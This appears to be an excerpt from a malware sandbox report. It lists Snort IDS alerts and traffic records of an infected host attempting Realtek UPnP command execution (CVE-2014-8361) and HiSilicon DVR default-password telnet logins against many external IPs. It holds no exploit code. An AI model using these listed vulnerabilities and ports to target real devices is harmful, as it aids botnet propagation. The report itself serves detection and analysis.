Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46148 -> 91.220.244.184:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46156 -> 91.220.244.184:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47432 -> 45.248.70.10:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47432 -> 45.248.70.10:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36336 -> 45.158.20.146:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36336 -> 45.158.20.146:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33636 -> 45.248.68.249:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33636 -> 45.248.68.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53100 -> 91.121.52.101:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53100 -> 91.121.52.101:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41206 -> 185.71.65.130:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41206 -> 185.71.65.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41210 -> 185.71.65.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44612 -> 45.84.88.32:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44612 -> 45.84.88.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44618 -> 45.84.88.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39664 -> 45.207.220.209:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39664 -> 45.207.220.209:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57354 -> 45.42.86.85:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57354 -> 45.42.86.85:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58176 -> 45.41.81.227:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58176 -> 45.41.81.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39702 -> 45.207.220.209:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48856 -> 203.210.221.136:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 210.223.80.230:23 -> 192.168.2.23:42994
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 63.250.103.61:23 -> 192.168.2.23:57118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 63.250.103.61:23 -> 192.168.2.23:57118
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39182 -> 45.122.132.196:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39182 -> 45.122.132.196:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48856
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48856
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57982 -> 45.250.174.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57982 -> 45.250.174.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57470 -> 45.33.245.194:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57470 -> 45.33.245.194:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55350 -> 185.245.0.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55350 -> 185.245.0.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38412 -> 45.42.81.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38412 -> 45.42.81.58:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43964 -> 45.207.220.250:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43964 -> 45.207.220.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38564 -> 45.158.21.25:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38564 -> 45.158.21.25:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37612 -> 185.221.85.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37612 -> 185.221.85.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37614 -> 185.221.85.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56342 -> 185.207.92.20:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56342 -> 185.207.92.20:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56346 -> 185.207.92.20:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59466 -> 185.113.135.232:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59466 -> 185.113.135.232:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59470 -> 185.113.135.232:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44682 -> 45.123.197.210:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44682 -> 45.123.197.210:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45026 -> 45.127.161.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45026 -> 45.127.161.40:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.174.60.76:23 -> 192.168.2.23:52986
Source: Traffic	Snort IDS: 716 INFO TELNET access 194.246.105.107:23 -> 192.168.2.23:58968
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37740 -> 45.153.8.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37740 -> 45.153.8.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60112 -> 45.115.230.54:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60112 -> 45.115.230.54:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 181.209.75.122:23 -> 192.168.2.23:60322
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 185.3.215.3:23 -> 192.168.2.23:45428
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33790 -> 45.115.239.36:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33790 -> 45.115.239.36:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57648 -> 45.120.186.225:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57648 -> 45.120.186.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47730 -> 45.248.70.69:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47730 -> 45.248.70.69:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55154 -> 185.215.47.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55154 -> 185.215.47.87:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55162 -> 185.215.47.87:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33810 -> 45.115.239.36:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57656 -> 45.120.186.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42130 -> 45.250.172.112:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42130 -> 45.250.172.112:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44086 -> 45.123.199.174:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44086 -> 45.123.199.174:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34296 -> 45.82.218.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34296 -> 45.82.218.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34300 -> 45.82.218.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57860 -> 45.121.80.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57860 -> 45.121.80.212:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.5.55.10:23 -> 192.168.2.23:43914
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.5.55.10:23 -> 192.168.2.23:43914
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43154 -> 45.43.235.227:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43154 -> 45.43.235.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59812 -> 45.154.3.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59812 -> 45.154.3.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49632 -> 45.33.248.205:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49632 -> 45.33.248.205:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35024 -> 45.43.227.114:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35024 -> 45.43.227.114:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50612 -> 45.120.207.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50612 -> 45.120.207.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59818 -> 45.154.3.16:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 181.209.75.122:23 -> 192.168.2.23:60322
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40724 -> 45.42.94.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40724 -> 45.42.94.141:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 176.107.91.35:23 -> 192.168.2.23:32922
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34658 -> 45.138.68.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34658 -> 45.138.68.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43036 -> 45.126.231.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43036 -> 45.126.231.68:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35622 -> 185.131.78.234:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35622 -> 185.131.78.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35624 -> 185.131.78.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45102 -> 91.77.225.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45102 -> 91.77.225.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45138 -> 91.77.225.62:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:34008 -> 168.187.133.157:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38836 -> 185.175.101.246:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38836 -> 185.175.101.246:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:49174
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:49174
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38880 -> 185.175.101.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41072 -> 45.42.91.151:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41072 -> 45.42.91.151:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34974 -> 185.160.196.150:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34974 -> 185.160.196.150:52869

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38902 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49054 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49056 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33960
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33964
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59522 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37578 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37588 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54488 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 54488
Source: unknown	Network traffic detected: HTTP traffic on port 54496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42524 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 54496
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42524
Source: unknown	Network traffic detected: HTTP traffic on port 42532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42532
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56242 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45200 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
